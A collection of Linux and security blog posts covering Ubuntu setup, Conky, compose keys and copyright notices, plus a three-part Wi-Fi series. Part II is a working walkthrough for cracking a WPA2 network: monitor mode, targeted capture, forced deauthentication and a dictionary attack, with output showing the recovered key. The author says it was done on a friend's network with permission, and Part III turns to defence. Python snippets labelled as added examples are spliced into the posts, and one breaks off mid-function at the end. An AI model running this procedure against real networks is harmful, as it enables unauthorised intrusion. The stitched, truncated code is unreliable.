January 30, 2012

Ubuntu's Unity interface is a step away from traditional graphical user interfaces. The intention is to make it the basis of a standard interface for everything from PCs to tablets to phones, and its implementation has been somewhat controversial. It's predicated on two main ideas: that most users only ever use a handful of applications, and that people prefer to search for things by typing -- as they do on the web -- rather than going through arcane menus and clicking on drop-downs. I take issue with the second of those, but before abandoning the interface entirely -- this is Linux, after all! -- it's worth exploring Unity to see what it has to offer.


Unity vs Unity 2D

There are two distinct forms of Unity -- Unity and Unity 2D -- and they look almost identical, but they are built very differently. The default, Unity (sometimes called "Unity 3D"), uses the Compiz window manager and your fancy 3D graphics card to add all sorts of eye candy like translucency and cool 3D graphical effects. It's really designed for modern hardware. Older gear will perform better with Unity 2D.

The easiest way to tell what you're running is to move your cursor over the Dash button:




But that may change in future versions. A more reliable way is to type this command in a terminal window:

echo $DESKTOP_SESSION

A return value of "ubuntu" means Unity (3D), while "ubuntu-2d" means Unity 2D.

You can select which version to run at login. Just click the gear icon before you enter your password.



Whatever you select will automatically become the default, so there's no need to repeat this process every login.



Unity's Launcher

The Launcher -- that icon bar on the left -- is Unity's most obvious feature. Click on a button and the application will start. Running apps get a little arrow head on the left, while the one currently in the foreground also scores an arrow on the right:



Left-clicking a Launcher button will bring an already open application to the foreground, but what if you want to open a separate copy? Easy, just click it with the middle button of your mouse instead. (If you only have a two-button mouse, right-click the Launcher button and choose New.)

Unity will track each separate opening of the same application by adding a check mark to the left ...



... so here I have three instances of Terminal running

The exception to all of the above is the Dash button at the top of the Launcher. This is the place you search for and start apps not already on the Launcher. Once an app is started, if you want to keep it there for easy access in future, just right-click it and tick Keep in Launcher:



To remove an item from the Launcher, right-click it and untick Keep in Launcher.

To re-order items, simply left-click the icon and drag it to where you want.

As the Launcher fills, items on the bottom will stack. Just move the cursor over them and they'll unpack.



With items unstacked, use the mouse's scroll wheel to move through the list, or left-click and drag to move quickly up and down the list.

Unity has a number of nifty screen-space saving features like hide-away scroll bars that only appear if you need them.



One initially confusing aspect for many new users is the apparent absence of menus. (This is even more disturbing if you maximise an app because the Exit, Maximise and Window buttons disappear too!) To find them again, just move the cursor to the Status Bar at the top of the screen ...



... or press the <Alt> key.


Unity has a heap of keyboard shortcuts built-in. Here are some of the most useful:
(Note: The Meta key is the one with the (shudder) Windows logo on it.)

Meta: Tap to open the Dash. Tap to close it again.
Meta: Hold it down to reveal the Launcher and number launchable applications. (See below.)
Meta + 1 thru to Meta + 0: Start Launcher item number n or switch to it if it's already running. (Hold down Shift to open a new window.)
Meta + A: Open the Application selector.
Meta + F: Open Files and Folders.
Meta + T: Open Trash.
Ctrl + Alt + T: Open a Terminal window.
Alt: Reveal the Application menu.
Alt + Tab: Switch between windows.


Hidden Linuxy Goodness

There are a few other things you may not be aware of -- what I like to call hidden Linuxy goodness. For example, you actually have four separate workspaces available by default. That means, for example, you could do word processing in workspace #1, email and web browsing in space #2, programming in space #3, etc. and simply switch between them.



This is where the next set of shortcut keys kick in:

Ctrl + Alt + Arrow keys: Shift between workspaces.
Meta + S: Activate the workspace switcher, zooming out on all of them.
Meta + W: Show all windows from all workspaces.
Ctrl + Alt + Shift + Arrow keys: Move the current window to a different workspace.


Another way of performing that last command is to right-click in an application's Title Bar and choose Move to Another Workspace.

Perhaps you're now thinking that Unity's not so scary after all. Personally, I rather like it. But if you'd like to try something more conventional, tune in next time. Complete reconfiguration is only a few commands away ...






Follow Geoff Palmer on Twitter

January 20, 2012

Now you've got Ubuntu installed and running, you'll have probably noticed there are one or two things missing. Things like MP3 playback and decoding, support for certain audio formats, Microsoft fonts, Java runtime playback, Adobe Flash, and the ability to play (and rip) DVDs.

The reason this stuff's missed out from the default install is that it's either proprietary -- meaning the source code is controlled by a third party and you have to agree to their terms and conditions in order to use it -- or it's subject to copyright restrictions, or, in some countries (notably the US), there may be legal issues surrounding its use. (You can find more about this stuff here.)

Some users have philosophical reasons for not using closed-source software too -- but many don't, and if you're one of them, read on ...

Getting extras

We need to install more software, and to do so you'll want to start Ubuntu's Software Centre. There are two ways to do this.
The graphical way is as follows:

Click the Dashboard Home button (on the top left),



choose More Apps,



select System,



click on Installed (See more results),



then scroll down and click Ubuntu Software.




Alternatively, you can hit <Alt + F2> to open the Run a command dialog box and start typing "software". Various options will filter out underneath, and you can click on Software Centre from there.





Once Ubuntu Software Centre is running, type "restricted" in the search pane,



select Ubuntu Restricted Extras and click Install.



You may get a dialog box warning that a couple of existing packages will need to be removed. That's fine. They'll be replaced with different versions. Just click Install Anyway.



Of course, Linux doesn't allow any old user to install any old software. You'll have to supply your root ("system admin") password first.



And now you'll get a blast from the past: license agreements. Remember them? Trust me, they're a rarity in the free software world!

Installation progress is shown in a little bar above the Install button.


And that's it. Your first program (actually, multiple-program) installation. Pretty easy, eh? (Yes, all new installations are that simple.)


The CSS secret

But we're not quite done yet. While you can now play unencrypted DVDs, you still won't be able to play most commercial ones due to their use of the Content Scramble System (or CSS), a proprietary encryption system that was cracked over a decade ago. In some countries it's still not legal to possess a copy of DeCSS (the unencryption program), and that's why it has to be installed separately.

To do that, we're going to look at another way to install software: directly from the command line.

Click the Dash Home button and type "terminal" in the search line. Click the Terminal icon and you're ready.


The necessary library (libdvdread4) should already have been installed as part of the Restricted Extras package, but it does no harm to check. Type in this command and press <Enter>:

sudo apt-get install libdvdread4

You'll be asked to supply the root password, and you should then get a message saying that it's already been installed. If you don't, go ahead and install it.

Now you need to install the CSS bit. You do so with this command:

sudo /usr/share/doc/libdvdread4/install-css.sh

Done! Close the terminal window -- <Ctrl + D> is a shortcut key for this -- and enjoy your DVDs.

If you still have problems, check out Playing DVDs on the Ubuntu site.






January 12, 2012

Linux downloads typically come as ISO images that will burn directly to a CD. You can also install them on a USB stick and boot them from there. But how do you get them to actually boot?

Most PCs are configured to boot from a removable disk first, a CD if no removable disk is found, then a hard disk drive if neither of the others are present, but you can't guarantee that! If your machine goes straight to hard disk, you'll need to change your BIOS settings, which can be accessed by pressing F2, F12, Delete, or ESC at boot. (The appropriate key differs with different BIOS makers.)

Note that you may need to change two settings in some BIOSes. Adding a USB stick to my American Megatrends BIOSed machines requires checking the Boot Device Priority and setting the Hard Disk Drives so that the first drive is the USB, not the hard disk.

And that's about as technical as it gets. With the boot disk booting, you're on your way. The rest is really straightforward.

(If you still have boot problems -- especially with older CD-ROM hardware -- check this link out.)



Installation: A graphical walk-through



I'm guessing you can figure out what to click here ...





You have two additional options here: if you're connected to the net and have a reasonably fast broadband connection, tick Download updates while installing, but note that the installation process may take quite a bit longer. (You'll be presented with automatic updates once you're up and running, so adding them now isn't essential -- especially as you're probably keen to get Ubuntu going!)

The second option to Install third party software should be ticked. I'm not sure what hardware's on your machine, but you probably want it all to work!





Unless you're an advanced user or really know what you're doing with hard disk partitions, choose Install Ubuntu alongside your existing operating system(s).





If you're connected to the net, Ubuntu will take a stab at where you are. If it gets it wrong, just click the appropriate time zone.





Local (New Zealand) keyboard layouts are typically English (US) / English (US), but Linux can accommodate everyone.





Now for the tricky stuff: who are you? I'll leave you to figure that out.

There are two other options to consider: Log in automatically is fine if you're the only user of the machine. Personally, I prefer the default: Require my password to log in. It's just more secure.





It depends on your hardware, but a typical Linux installation (excluding automatic updates) will take 10-20 minutes. In the meantime, browse some slides of what your new OS can do, or just go and make a coffee.





That's it. Ready for a reboot.





At boot time, you'll now get a menu allowing you to choose which operating system to start. By default it's set to Ubuntu, and if you do nothing for 10 seconds Ubuntu will start automatically. But of course, this is Linux. All this is configurable -- and I'll show you how in coming blogs.





In the meantime, check out Ubuntu and the new Unity desktop.

Next time, we'll have a quick look at what's there (and what's missing). And how to add the missing stuff!






December 8, 2011


In this month's print edition of PC World, reader David Crickmer mentions he'd like to see a series about getting started in Linux. Since this blog largely revolves around the portly penguin, I thought I'd give it a go ...


Which Linux?

The first decision -- which "brand" of Linux to opt for -- can seem the most daunting. Since Linux is free and open, anyone can create their own unique release. Linux versions are known as distributions, and the website DistroWatch.com lists more than 4,000 of 'em!

You'll find Linuxes targeted at specific hardware from the latest netbooks to ancient PCs. There are Linuxes designed for specific purposes such as computer forensics or disk partitioning; Linuxes to run web servers and supercomputers; Linuxes for scientists, mathematicians and astronomers; Linuxes to build media players or backup servers; Linuxes for national, religious and political groups; and even Linuxes that mimic the look and feel of other well-known operating systems.

The key point to remember is that all versions of Linux are based on the Unix operating system. I won't say that once you've mastered one, you've mastered them all, but it's certainly the case that once you're familiar with the way Linux works, you won't be daunted by any of those 4,000+ distros!

They're all free, and if you don't like one, it's easy to replace it with another.

This astonishing Linux time-line charts the linkages and relationships between many well-known distros.




Which Desktop?


There are three main Linux desktops -- the desktop being the Graphical User Interface (or GUI) that forms the basis of your working environment. Gnome, (aficionados pronounce it "g-nome" as opposed to "nome"), KDE (short for the K Desktop Environment), and Unity (recently released by Ubuntu).

All have their particular strengths, but don't get too hung up on which one to pick at this stage. While some distros are desktop-specific, most allow you to install alternatives so you can try them all and see which you prefer -- which is exactly what we'll be doing a bit later on. (One of the neat things about Linux is that you don't need to reboot to change desktops. Just log out and log in again!)


Gnome 3
KDE 4.7
Unity


Getting Hold of Linux

OK, so where do you get it?

Frankly, Linux is everywhere, and one of the easiest sources is the good old magazine cover disc. (This month's print edition of PC World features no less than three complete distributions!)

The other alternative is to download and burn your own CD or write it to a USB stick. A typical distro is around 600-650MB so you'll need a broadband account or a lot of patience. We're going to focus on Ubuntu for this series, and you'll find its download alternatives here.

One of the reasons I recommend Ubuntu is that it's not only tremendously popular and has great user support, but it also has three simple installation alternatives: you can do a straight download and install, run it from a CD or USB drive, or even install and run it under Windows.



Why not run Linux from a CD or DVD?
In a word, performance. CD/DVD-ROM drives are utter slugs compared to hard disc drives. If you want to give Linux a reasonable run, use a USB-2 or USB-3 drive, but for my money, HDD is best!

I'm not going to give you chapter and verse on download and installation, mainly because Ubuntu do it so well! Really, check out their website. Simply select your preferred alternative and follow the instructions.

If you're still a little nervous, simply download and burn a copy to CD and next time I'll walk you through the installation process, screen-by-screen. I'll also show you how to default to your preferred operating system on boot, and -- heaven forbid -- deinstall Linux if you hate it.






November 20, 2011


Conky is, in its own words, "a free, light-weight system monitor ... that displays any information on your desktop." Sounds pretty dull, right? Well check it out ...








Click on the graphics above
to link to details of how they were done!



Installing Conky's a doddle: just use your package manager. For Ubuntu/Debian users, that means simply typing

sudo apt-get install conky

on the command line.

Once it's installed, you'll need a .conkyrc script in your /home/username folder. Here's a basic one to get you started ...

# Use Xft?
use_xft yes
xftfont OFL Sorts Mill Goudy:size=8
xftalpha 0.8
text_buffer_size 2048

# This is the number of times Conky will update before quitting.
# Set to zero to run forever.
total_run_times 0

# Update interval in seconds
update_interval 1

# Create own window instead of using desktop (required in nautilus)
own_window yes
own_window_type override
own_window_class conky
own_window_type panel
background no
own_window_type normal
own_window_transparent yes
own_window_argb_visual yes
own_window_hints undecorated,below,sticky,skip_taskbar,skip_pager
own_window_title conky-semi
own_window_class conky-semi

alignment top_right
border_width 1
cpu_avg_samples 2
default_color white
default_outline_color white
default_shade_color white
draw_borders no
draw_graph_borders yes
draw_outline no
draw_shades no
use_xft yes
xftfont DejaVu Sans Mono:size=8
gap_x 10
gap_y 10
minimum_size 5 5
net_avg_samples 2
no_buffers yes
out_to_console no
out_to_stderr no
extra_newline no
own_window yes
own_window_class Conky
own_window_type desktop
stippled_borders 0

uppercase no
use_spacer none
show_graph_scale no
show_graph_range no

# Use double buffering (reduces flicker, may not work for everyone)
double_buffer yes

TEXT
${color goldenrod}Hostname: ${color} $nodename
${color goldenrod}Linux Kernel: ${color} $kernel
${color goldenrod}CPU Details: ${color} $machine, $freq(MHz)
$color$stippled_hr
${color}CPU History: ${color darkgreen}${cpugraph 20,0 0000ff 00ff00}
${color}CPU Usage:${color magenta2} $cpu% ${cpubar 6,0}

${color}RAM Usage:${color green} $mem ($memperc%) ${membar 6,0}
${color}Available RAM:${color green} $memmax
${color}Swap Usage:${color yellow} $swap/$swapmax - $swapperc% ${swapbar 4}

${color grey}Processes:$color $processes ${color grey}Running:$color $running_processes
$color$stippled_hr
${color}File systems:
/ $color${fs_used /}/${fs_size /} ${fs_bar 6 /}
${color grey} Used: $color$fs_used_perc% ${color grey}Free: $color$fs_free_perc%
${color}Networking:
${color grey}Ethernet: Up:$color ${upspeed eth0} ${color grey} Down:$color ${downspeed eth0}
${color grey}Wireless: Up:$color ${upspeed wlan0} ${color grey} Down:$color ${downspeed wlan0}
$color$stippled_hr
$alignc${color}Processes:$color $processes ${color grey}Running:$color $running_processes
$alignc${color}(top 5 sorted by CPU usage)
${color goldenrod} NAME PID CPU% MEM%
${color} ${top name 1} ${top pid 1} ${top cpu 1} ${top mem 1}
${color} ${top name 2} ${top pid 2} ${top cpu 2} ${top mem 2}
${color} ${top name 3} ${top pid 3} ${top cpu 3} ${top mem 3}
${color} ${top name 4} ${top pid 4} ${top cpu 4} ${top mem 4}
${color} ${top name 5} ${top pid 5} ${top cpu 5} ${top mem 5}

$alignc${color}(top 5 sorted by MEM usage)
${color goldenrod} NAME PID CPU% MEM%
${color} ${top_mem name 1} ${top_mem pid 1} ${top_mem cpu 1} ${top_mem mem 1}
${color} ${top_mem name 2} ${top_mem pid 2} ${top_mem cpu 2} ${top_mem mem 2}
${color} ${top_mem name 3} ${top_mem pid 3} ${top_mem cpu 3} ${top_mem mem 3}
${color} ${top_mem name 4} ${top_mem pid 4} ${top_mem cpu 4} ${top_mem mem 4}
${color} ${top_mem name 5} ${top_mem pid 5} ${top_mem cpu 5} ${top_mem mem 5}
$color$stippled_hr
$alignc${color}System Uptime:${color DarkOrange1} $uptime



Now all you need do is kick off Conky by hitting Alt+F2 and entering conky, or type this on the command line:

conky &

(The ampersand (&) will make it run as a background process.)

Now here's the fun part. Open .conkyrc in a regular text editor and make changes to it. Save those changes, and your display should be updated. Make some more changes, save them, and again you'll see the changes immediately reflected in Conky -- well, within a second anyway. That's what the line

update_interval 1

is all about. In practice, once you're happy with your setup, you might want to reduce it to only update every five or ten seconds.

And what if the Conky display disappears altogether? Use Undo to undo whatever you last changed in .conkyrc and re-save it or, if it's totally screwed, use Alt+F2 or the command line to enter killall conky and restart from scratch.

For (much) more documentation on settings and features, type

man conky

or

man conky > conky.txt

to copy the manual pages to a file called conky.txt, from whence you can study them at leisure!









November 2, 2011


Here they come. The first copyright infringement notices under the two-month old Copyright Amendment Act are currently winging their way to unlucky downloaders. Telecom have fired off 42, Orcon eight and TelstraClear -- whose Chief Executive Allan Freeth at least spoke out against this ridiculous law -- are in the process of validating "a few dozen allegations".

So far, all appear to involve music downloads, with 40 of the 50 sent to Telecom and Orcon involving tracks by Rihanna, and another six for downloaders of Lady Gaga. Great to see the Recording Industry Association of New Zealand -- which issued the notices -- looking after New Zealand artists ...

Let me know if you get one of these notices. I'm very interested in seeing how this process works -- particularly if you challenge it.


Footnote
Here are the concluding paragraphs of Freeth's opinion piece "What's wrong with copyright":

Instead of bringing in a law that we believe will not and cannot work, our government should be breaking monopolies, allowing personal choice and letting New Zealanders experience information and entertainment when the rest of the world does.

Instead, it has chosen to introduce a law that could turn ordinary Kiwis into law-breakers.


October 27, 2011


I was recently faced with providing foreign language accent characters in Linux. Most word processors allow you to do this graphically -- via the Insert / Special Characters function in LibreOffice or OpenOffice, for example -- but this soon gets tedious for anything but the occasional insert. Doing it straight from the keyboard would be considerably quicker...

There are a number of ways to achieve this in Linux. Here's what I reckon's the easiest.

Open a console session and type:

setxkbmap -option compose:ralt

And that's it! What you've done is assign a special Linux key called <compose> to the right-hand ALT key -- that's the one to the right of the Spacebar. (You could of course assign it to any key you like, but personally I never use "ralt".)

Now, hold down the <compose> key and type <`> followed by <e> and you get an accented è (that's the grave accent), while <compose> + <'> + <e> yields é (with an acute accent).

Note that you can use these keys in any application. And that's just the beginning!

Using <compose> you can generate hundreds of different symbols. To get an idea of the possibilities, take a look at the file /usr/share/X11/locale/en_US.UTF-8/Compose.

Here are just a few of the characters you can create straight from the keyboard. (I've rendered them in a large font so they display better.)

   ÷   ©   ®
   ô   ø   µ
   å   ♥   ¶
   £   €   ¥
   ₨   ß   ç
   ň   ŋ   ƶ
   à  ±   ☭


And here are the key combinations I used to create them:

<compose> + <:> + <->
<compose> + <o> + <c>
<compose> + <o> + <r>

<compose> + <^> + <o>
<compose> + </> + <o>
<compose> + <m> + <u>

<compose> + <o> + <a>
<compose> + <?> + <!>
<compose> + <<> + <3>

<compose> + <P> + <P>
<compose> + <l> + <->
<compose> + <e> + <=>

<compose> + <y> + <=>
<compose> + <R> + <s>
<compose> + <s> + <s>

<compose> + <,> + <c>
<compose> + <c> + <n>
<compose> + <n> + <g>

<compose> + </> + <z>
<compose> + <_> + <A>
<compose> + <+> + <->
<compose> + <C> + <C> + <C> + <P>



(And in case you're wondering about this column's title, it's a subtle homage to a certain Monty Python classic...)



October 17, 2011

Part III: Securing Your Wireless Network

Wireless networks are wonderfully convenient but, as we've seen, they're also vulnerable to being hacked. Here's how to make it hard for hackers!


Essential Measures

1. Use a proper password
What makes a good password? Anything that's not in a dictionary for a start! If you want to use something memorable, think passphrases rather than passwords. "2 bee 0r NoT two-B" is vastly more secure than "To be or not to be", but for real security you can't beat long strings of properly randomised junk. How about

bT6i3W429TQRxnefaD1xtZc3b6kgit2eMbk52S0ndK1Km5upS2AI9iakyTZIvqt

or

<CL$8L=noSj+^1)5<4LTaB7#R%PHH2-204V^_fj.@t:%kpsO0p,vJOS8<-qEOm^

Now they're what I call passwords! Both come from Steve Gibson's Perfect Passwords generator. You don't have to use the whole string. Just the first 10-12 characters would do. If you do use the whole string, you'll need to save it on a USB stick which makes it a little less convenient, but no one's ever likely to crack your network.


2. Change the default password
Don't let a hacker reconfigure your hardware! Your wireless router will come with a default password. Change it! There are plenty of lists around (like this one) containing default logins and passwords.


3. Enable encryption
Without encryption, anyone can capture your wireless traffic! Use WPA2 in preference to WPA. Don't ever use WEP; it can be cracked in minutes.


4. Update your firmware
Things change, new vulnerabilities are discovered daily. Check your router's running the latest firmware update.


5. Use HTTPS for management
If you manage your router wirelessly, do so via (encrypted) HTTPS rather than regular HTTP. With the latter, your router's login name and password will be broadcast in clear text.



Useful Measures

6. Disable SSID
Disabling SSID (Service Set Identifier) broadcast will essentially hide your network from casual passers-by. Experienced hackers will still easily detect it, but it requires a little extra work and suggests its owner has a little extra savvy, so they may go for an easier target.


7. Turn on logging
Router logs are often disabled by default. Turn them on. Some routers will even email you of suspicious activity. Invaluable!


8. Switch it off!
If you're going away for a while, turn off your router -- or at least switch off the Wi-Fi. If it ain't broadcasting, it can't be hacked!



Not So Useful Stuff

9. Filter MAC addresses
Every piece of networked equipment has a unique Media Access Control (MAC) address, and at first it would seem to be a good idea to only allow access to particular devices. But the internal tables are a pain to maintain -- you'll have to determine and add the MAC address of every new piece of equipment you connect -- and they're trivially easy to spoof anyway, so Not So Useful.


10. Disable DHCP
Again, I put this in the Not So Useful category merely because it's a pain to maintain. With Dynamic Host Configuration Protocol (DHCP) enabled, new devices are automatically assigned IP addresses. With it disabled, they have to be assigned manually. For most casual users that's just a hassle.
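
Measure 1 can be checked before a passphrase ever reaches the router. The following is an added example, not part of the original post: it generates a random WPA passphrase and estimates how long an exhaustive search would take at the rate shown in the aircrack-ng run in Part II. The function names and the sample wordlist are assumptions made for illustration.

```python
import secrets
import string

# Rate from the aircrack-ng run in Part II: 850148 keys tested in 00:32:51,
# displayed as "455.42 k/s" (keys per second).
OBSERVED_KEYS_PER_SECOND = 455.42
SECONDS_PER_YEAR = 365.25 * 24 * 3600

# WPA/WPA2-PSK accepts passphrases of 8 to 63 printable ASCII characters.
WPA_MIN_LEN, WPA_MAX_LEN = 8, 63
ALPHANUMERIC = string.ascii_letters + string.digits

# Constructed sample wordlist; "swedishchef" is the key found in Part II.
SAMPLE_WORDLIST = ["password", "letmein", "swedishchef", "qwerty123"]


def generate_passphrase(length=12, alphabet=ALPHANUMERIC):
    """Return a random passphrase drawn from the operating system's CSPRNG."""
    if not WPA_MIN_LEN <= length <= WPA_MAX_LEN:
        raise ValueError("WPA passphrases must be 8 to 63 characters long")
    return "".join(secrets.choice(alphabet) for _ in range(length))


def pool_size(passphrase):
    """Size of the character pool an exhaustive search would have to cover."""
    pool = 0
    if any(c in string.ascii_lowercase for c in passphrase):
        pool += 26
    if any(c in string.ascii_uppercase for c in passphrase):
        pool += 26
    if any(c in string.digits for c in passphrase):
        pool += 10
    if any(c in string.punctuation or c == " " for c in passphrase):
        pool += len(string.punctuation) + 1  # 32 symbols plus the space
    return pool


def audit(passphrase, wordlist=SAMPLE_WORDLIST, rate=OBSERVED_KEYS_PER_SECOND):
    """Report whether a passphrase is usable and how much guessing it resists."""
    valid = (WPA_MIN_LEN <= len(passphrase) <= WPA_MAX_LEN
             and all(32 <= ord(c) <= 126 for c in passphrase))
    if not valid:
        return {"valid": False, "in_wordlist": False, "guesses": 0, "years": 0.0}

    words = [w.lower() for w in wordlist]
    lowered = passphrase.lower()  # case variants of a listed word count as hits
    if lowered in words:
        # A listed word falls as soon as the search reaches its position.
        in_wordlist = True
        guesses = words.index(lowered) + 1
    else:
        # Upper bound: only meaningful if every character was chosen at random.
        in_wordlist = False
        guesses = pool_size(passphrase) ** len(passphrase)

    years = guesses / rate / SECONDS_PER_YEAR
    return {"valid": True, "in_wordlist": in_wordlist,
            "guesses": guesses, "years": years}


if __name__ == "__main__":
    candidates = ["swedishchef", "bT6i3W429TQR", generate_passphrase(12)]
    for candidate in candidates:
        result = audit(candidate)
        print(f"{candidate!r}: in wordlist={result['in_wordlist']}, "
              f"worst case {result['years']:.3g} years at "
              f"{OBSERVED_KEYS_PER_SECOND} keys/s")
```

The figure for a passphrase that is not in the wordlist is an upper bound on the attacker's work. A memorable phrase built from words scores well on character count but can still fall to a larger wordlist or to mangling rules.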



October 5, 2011


Part II: The crack


Having assembled the tools, it's time to get to cracking. Literally!

Note: The network I cracked belonged to a friend. I did so with his permission, purely as a security exercise. Using these tools for any other purpose is probably illegal!

Also note that in the examples that follow I've randomly altered network names and MAC addresses.

(I used the Slitaz Live Aircrack-ng Distribution on a USB stick for this attack. It's Linux, of course, so if you're running from Windows, the command syntax may be slightly different.)



1. Start monitor mode
Aircrack-ng is a suite of command-line tools, so open up a console window.

The first step is the critical one. You need to put your wireless card into monitor mode:

airmon-ng start wlan0

Here's what that yielded on my laptop:

Interface       Chipset          Driver

wlan1           Broadcom         b43 - [phy0]
wlan0           Realtek RTL8187L rtl8187 - [phy1]
                                 (monitor mode enabled on mon0)


Success! But only on the USB wireless card. The laptop's built-in Broadcom card may work with a driver, but that could require a lot more work.



2. Scan for targets
Okay, let's see what networks are out there that we can monitor ...

airodump-ng mon0

Airodump-ng is a wireless packet capture tool that details all the access points and clients within range.

BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH  ESSID
                   
 00:16:50:59:52:9C  -50       63        1    0   6  54e  WPA  TKIP   PSK  Scuba
 00:22:75:31:11:5A  -51       32        3    0   1  54e  WPA2 CCMP   PSK  MyNetwork
 00:12:34:56:98:AB  -53       47        2    0   3  54e. WPA2 CCMP   PSK  Target_Net
 00:11:95:DD:8D:99  -60       16        2    0   1  54   WEP  WEP         Private Network
 00:22:74:52:86:3F  -61       28       16    0   7  54e  WPA2 CCMP   PSK  Belkin_N_Wireless_02843F
 00:02:63:50:20:22  -61       30       43    0   9  11 . OPN              OpenNet
 
 BSSID              STATION            PWR   Rate    Lost  Packets  Probes

 00:12:34:56:98:AB  00:11:EF:8B:62:77  -39    0 -36e     0        6  Target_Net  



Hit Ctrl+C to stop the capture and note the target's Channel number and BSSID for input into the next step. (Note that I'm targeting a WPA2 network. That WEP would just be too easy!)



3. Begin the capture
We now want to capture just the data going to a particular target. We do so using the following syntax:

airodump-ng -c (channel) -w (name of the capture file) --bssid (bssid) mon0

So targeting Target_Net (above) would give us ...

airodump-ng -c 3 -w Test_Data --bssid 00:12:34:56:98:AB mon0

 CH  3 ][ Elapsed: 4 mins ][ 2011-10-04 21:42 ]
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
 00:12:34:56:98:AB  -51  64     1746     9642    0   3  54e. WPA2 CCMP   PSK  Target_Net
 BSSID              STATION            PWR   Rate    Lost  Packets  Probes
 00:12:34:56:98:AB  00:11:EF:8B:62:77  -38   24e-24e   115     9701  Target_Net



Now we can simply wait for a WPA handshake to occur, or we can try and push things along.



4. (Optional) Forcing a handshake
Open a new console window while the first continues running and use aireplay-ng to inject packets into the network to de-authenticate the client. When you do so, the client will re-authenticate via a WPA handshake, and that's exactly what we want!

aireplay-ng -0 3 -a 00:12:34:56:98:AB mon0

There are tons of options with aireplay-ng, but -0 3 (send three de-authentications) worked for me ...

21:43:34  Waiting for beacon frame (BSSID: 00:12:34:56:98:AB) on channel 3
NB: this attack is more effective when targeting
a connected wireless client (-c <client's mac>).
21:43:34  Sending DeAuth to broadcast -- BSSID: [00:12:34:56:98:AB]
21:43:35  Sending DeAuth to broadcast -- BSSID: [00:12:34:56:98:AB]
21:43:35  Sending DeAuth to broadcast -- BSSID: [00:12:34:56:98:AB]


How do you know if it worked? Check the top right-hand corner of the first console and you should see confirmation.

 CH  3 ][ Elapsed: 5 mins ][ 2011-10-04 21:43 ][ WPA handshake: 00:12:34:56:98:AB
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
 00:12:34:56:98:AB  -51  64     1746     9642    0   3  54e. WPA2 CCMP   PSK  Target_Net
 BSSID              STATION            PWR   Rate    Lost  Packets  Probes
 00:12:34:56:98:AB  00:11:EF:8B:62:77  -38   24e-24e   115     9701  Target_Net





5. Apply a little brute force
We have all the data we need, now it's just a matter of (hopefully) cracking the password. Locate the file where you saved the data in Step 3, the password wordlist you downloaded last time, and run them through aircrack-ng. The format is:

aircrack-ng -w (dictionary file) (data file)

You'll see that Step 3's saved several files with different extensions. The one aircrack-ng needs is the .cap file, so in my case I run ...

aircrack-ng -w wordlist.txt Test_Data.cap

Now it's just a matter of waiting while aircrack-ng tries the possible password combinations.

                                 Aircrack-ng 1.1 r1904


                   [00:32:51] 850148 keys tested (455.42 k/s)


                           KEY FOUND! [ swedishchef ]


      Master Key     : 80 FD 4C 4D 72 34 5F 08 83 67 A0 E5 D3 73 06 EB
                       6B 9F D6 2D AA E4 EC C2 24 7D F7 D3 EF A7 6E FE

      Transient Key  : 97 13 7B FF DF 0A 29 07 85 3A 0F FA FC 4D 62 92
                       14 F8 33 9B 67 01 08 B3 DE 21 49 B9 53 F7 D9 FF
                       18 9A BA 40 B6 A3 2D 92 CB 27 A7 7A EE F6 7A F0
                       21 52 8E 50 00 14 35 F8 4A 0A 5D 49 BC 15 E2 08

      EAPOL HMAC     : 85 31 D0 6F 21 8F D7 7A D9 FA EF F1 66 4B 5A B2



Bingo! And there's our password. Simple as that!



So what can you do to maximise your security and prevent hacks like this? Read Part III, coming soon...!

Follow Geoff Palmer on Twitter

October 2, 2011

Part I: Assembling the tools

Wireless networks are everywhere, but many are insecure. The older WEP protocol has been thoroughly compromised and most users rely on the more robust WPA protocol. But a chain is only as strong as its weakest link, and that weak link is invariably the password used to secure the network. So I decided to try a little wi-fi cracking to see how easy it is ...

Wow! In little over an hour I went from neophyte to bona fide cracker, my first pwned network under my belt. It's disturbingly simple. Here's how I did it ...

Note: The network I cracked belonged to a friend. I did so with his permission, purely as a security exercise. Using these tools for any other purpose is probably illegal!


The basic toolset consists of three parts:
  1. aircrack-ng
  2. a wordlist
  3. a suitable wireless receiver

First, the easy stuff ...


The Software
Aircrack-ng isn't a single program; it's a suite of more than a dozen tools for auditing wireless networks. It runs under Linux and Windows, there's a version for VMware virtual machines, and even a proof-of-concept version for the iPhone.

Linux users can install the whole suite by simply selecting "aircrack-ng" from their distribution's repository. Other users can download the latest from aircrack-ng's site.

Another alternative is to download the ready-built Slitaz Live Aircrack-ng Distribution. It's a bootable Linux CD with aircrack-ng built in.

The other piece of software you'll need is a password wordlist. The way WPA cracking works is to take one word at a time from the wordlist and try it in various common combinations to see if its encoded form matches what's been captured. If this sounds slow and laborious, it is, but it's the sort of thing that computers excel at. Depending on your processor, it's possible to test many thousands of combinations per second.

Googling for "wordlists" will turn up dozens, in many different languages. I settled for the English dictionary from this collection. It contains a modest 300,000 possible passwords in a 1MB file. Obviously, the bigger the wordlist, the more likely you are to crack the password. If you're really keen, there's the Openwall Wordlist Collection, a 33GB whopper that costs around US$30.
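The wordlist matching described above, and the aircrack-ng run in Part II, suggest a check you can run against your own network's passphrase: is it covered by a wordlist, and how long would a search take at the 455.42 keys per second shown in that output? This is an added example, not code from the article or from aircrack-ng. The sample wordlist is constructed, `base_word` is a hypothetical helper modelling one simple variation, and `derive_pmk` uses the standard WPA-PSK key derivation (PBKDF2-HMAC-SHA1 salted with the SSID).

```python
import hashlib
import math
import string

KEYS_PER_SECOND = 455.42  # rate shown in the page's aircrack-ng output
# Constructed stand-in for a downloaded wordlist file.
SAMPLE_WORDLIST = ["password", "letmein", "swedishchef", "dragon", "sunshine"]
POOLS = [string.ascii_lowercase, string.ascii_uppercase, string.digits,
         string.punctuation + " "]


def derive_pmk(passphrase, ssid):
    """The 'encoded form' a guess is turned into: PBKDF2-HMAC-SHA1 over the
    passphrase, salted with the SSID, 4096 iterations, 32 bytes."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("ascii"),
                               ssid.encode("utf-8"), 4096, 32)


def base_word(passphrase):
    """Hypothetical helper: lower-case the passphrase and strip digits and
    punctuation from both ends (one simple variation, an assumption)."""
    return passphrase.lower().strip(string.digits + string.punctuation)


def audit_passphrase(passphrase, wordlist, keys_per_second=KEYS_PER_SECOND):
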